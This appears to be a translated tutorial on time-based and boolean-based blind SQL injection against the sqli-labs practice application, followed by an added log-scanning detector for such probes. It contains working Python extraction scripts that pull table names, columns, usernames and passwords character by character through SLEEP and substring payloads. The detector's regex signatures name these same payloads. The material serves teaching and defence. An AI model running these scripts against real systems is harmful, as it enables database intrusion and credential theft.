Time-based blind injection
Time-based blind SQL injection (Time-Based Blind SQL Injection) is a SQL injection technique that infers data from differences in database response time. Its core idea is to construct a specific SQL query that makes the database stall while executing it, so that the presence or absence of the delay reveals the data.
The principle of time-based blind injection can be summarized as:
Use a database time function (such as SLEEP()) to create a delay;
Observe whether the delay occurs to decide whether a given condition is true;
Infer the target data character by character or by binary search.
Take Less-9 from sqli-labs as an example:
Getting the table
Walk the character positions by binary search to look up the table name
import requests
import time

url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2  # seconds the injected SLEEP() should stall the query


def is_injected(payload):
    # True when the response took longer than the injected delay (or timed out)
    start = time.time()
    try:
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    return time.time() - start > delay


table = []
for pos in range(1, 30):
    for c in range(32, 127):
        payload = (f"IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables "
                   f"WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)")
        if is_injected(payload):
            table.append(chr(c))
            print("".join(table))
            break
    else:
        # no character matched at this position, so the name has ended
        break
print("".join(table))
The result is as follows:
Getting the columns
import requests
import time

url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2
table_name = "emails"  # table name recovered in the previous step


def is_injected(payload):
    # True when the response took longer than the injected delay (or timed out)
    start = time.time()
    try:
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    return time.time() - start > delay


column = []
for pos in range(1, 30):
    for c in range(32, 127):
        payload = (f"IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns "
                   f"WHERE table_name='{table_name}' LIMIT 1),{pos},1))={c},SLEEP({delay}),0)")
        if is_injected(payload):
            column.append(chr(c))
            print("".join(column))
            break
    else:
        # no character matched at this position, so the name has ended
        break
print("".join(column))
The result is as follows:
Getting the data
import requests
import time

url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2
table_name = "emails"  # table name recovered above
column_name = "id"     # column name recovered above


def is_injected(payload):
    # True when the response took longer than the injected delay (or timed out)
    start = time.time()
    try:
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    return time.time() - start > delay


data = []
for pos in range(1, 50):
    for c in range(32, 127):
        payload = (f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),"
                   f"{pos},1))={c},SLEEP({delay}),0)")
        if is_injected(payload):
            data.append(chr(c))
            print("".join(data))
            break
    else:
        # no character matched at this position, so the value has ended
        break
print("".join(data))
The result is as follows:
Boolean blind injection
Boolean-based blind SQL injection (Boolean-Based Blind SQL Injection) is a SQL injection technique used to infer information by observing the application's boolean response (true/false) when the database's data cannot be read directly.
Characteristics of boolean blind injection
No direct data return: the attacker cannot see the query result directly and can only infer information from the page's true/false response.
Character-by-character guessing: the data has to be guessed one character at a time, which is slow, but it works when data cannot be read directly.
Dependence on the page response: the attacker must be able to distinguish the page's response when the condition is true from its response when it is false.
Take Less-8 from sqli-labs as an example:
Getting the table names
import requests

url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = ('and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema='
           'database()%20limit%20{t},1),{w},1))={A}%20--%20k')
# candidate character codes tried at every position
list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95,
         65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86,
         87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111,
         112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]
str1 = "You are in..........."  # text the page shows only when the condition is true
str2 = bytes(str1, 'utf-8')
tables1 = ''
tables2 = ''
tables3 = ''
tables4 = ''
for i in range(0, 4):
    for j in range(1, 10):
        for s in list1:
            p = payload.format(t=i, w=j, A=s)
            u = requests.get(url + p)
            if str2 in u.content:
                if i == 0:
                    tables1 += chr(s)
                    print("正在对比第1个表,", "第", j, "个字符", tables1)
                elif i == 1:
                    tables2 += chr(s)
                    print("正在对比第2个表,", "第", j, "个字符", tables2)
                elif i == 2:
                    tables3 += chr(s)
                    print("正在对比第3个表,", "第", j, "个字符", tables3)
                elif i == 3:
                    tables4 += chr(s)
                    print("正在对比第4个表,", "第", j, "个字符", tables4)
                break
print('tables1-->', tables1)
print('tables2-->', tables2)
print('tables3-->', tables3)
print('tables4-->', tables4)
The result is as follows:
Getting the column names
import requests

# candidate characters tried at every position
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q',
         'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7',
         '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',
         'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.']
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = ('%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security'
           '%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k')
column = ['', '', '', '', '']
str1 = 'You are in...........'  # text the page shows only when the condition is true
str2 = bytes(str1, 'utf-8')
for j in range(0, 3):
    for i in range(1, 9):
        for ch in list1:
            # compare the known prefix plus one candidate character against left(name, i)
            p = payload.format(w=j, n=i, c=column[j] + ch)
            u = requests.get(url + p)
            if str2 in u.content:
                column[j] += ch
                print('正在对比第', j + 1, '个字段第', i, '个字符', column[j])
                break
for c in range(0, 5):
    print('column', c + 1, '-->', column[c])
The result is as follows:
Getting the data
import requests

# candidate characters tried at every position
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q',
         'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7',
         '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',
         'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.']
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
str1 = 'You are in...........'  # text the page shows only when the condition is true
str2 = bytes(str1, 'utf-8')
username = [''] * 14
password = [''] * 14
for i in range(1, 15):
    for j in range(1, 11):
        for ch in list1:
            p = payload.format(n=i, w=j, d=username[i - 1] + ch)
            u = requests.get(url + p)
            if str2 in u.content:
                username[i - 1] += ch
                print('正在对比第', i, '个记录的username的第', j, '个字符', username[i - 1])
                break  # character found, move on to the next position
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
    for j in range(1, 11):
        for ch in list1:
            p = payload2.format(n=i, w=j, d=password[i - 1] + ch)
            u = requests.get(url + p)
            if str2 in u.content:
                password[i - 1] += ch
                print('正在对比第', i, '个记录的password的第', j, '个字符', password[i - 1])
                break  # character found, move on to the next position
print('id username password')
for i in range(1, 15):
    print(i, '-', username[i - 1], '-', password[i - 1])
The result is as follows:
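From the defender's side, the probe shapes used in both walkthroughs above (IF(ASCII(SUBSTR(...))) conditions wrapped around SLEEP() for Less-9, ascii(substr(...)) and left(...) comparisons against information_schema for Less-8) are easy to recognise in web server access logs, and because each candidate character costs one request, a single client produces a burst of them. The following is an added example, not code from the original post: it scans constructed log lines (not real traffic) for those signatures and counts flagged requests per client; the log layout, the regular expressions and the threshold are my assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not real traffic): one normal request, two Less-9 style time-based probes, one Less-8 style boolean probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-9/index.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-9/index.php?id=1%27+AND+IF%28ASCII%28SUBSTR%28%28SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema%3DDATABASE%28%29+LIMIT+1%29%2C1%2C1%29%29%3D101%2CSLEEP%282%29%2C0%29--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-9/index.php?id=1%27+AND+IF%28ASCII%28SUBSTR%28%28SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema%3DDATABASE%28%29+LIMIT+1%29%2C2%2C1%29%29%3D109%2CSLEEP%282%29%2C0%29--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-8?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101%20--%20k HTTP/1.1" 200 340
"""

# Assumed common-log-format layout: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Signatures of the probe shapes used in the two walkthroughs above.
TIME_BASED = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
CHAR_ORACLE = re.compile(r'\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(|\bleft\s*\(', re.I)
SCHEMA_ENUM = re.compile(r'\binformation_schema\.(tables|columns)\b', re.I)

def classify_query(raw_query):
    """Return the set of signature tags matching one URL-encoded query string."""
    q = unquote_plus(raw_query)  # decode %27, %28, '+' etc. before matching
    tags = set()
    if TIME_BASED.search(q):
        tags.add("time-based")
    if CHAR_ORACLE.search(q):
        tags.add("char-oracle")
    if SCHEMA_ENUM.search(q):
        tags.add("schema-enum")
    return tags

def scan_log(text):
    # Both blind variants get HTTP 200, so the status code is useless here;
    # the query string is what gives the probe away.
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        tags = classify_query(parts.query)
        if tags:
            hits.append((m.group("ip"), parts.path, sorted(tags)))
    return hits

def noisy_clients(hits, threshold=2):
    # One request per candidate character means a flagged client repeats quickly.
    counts = Counter(ip for ip, _, _ in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Response latency is not in the common log format, so a time-based probe is only visible here through its query string; if your server logs request duration, a second rule on repeated slow responses for the same path complements this one.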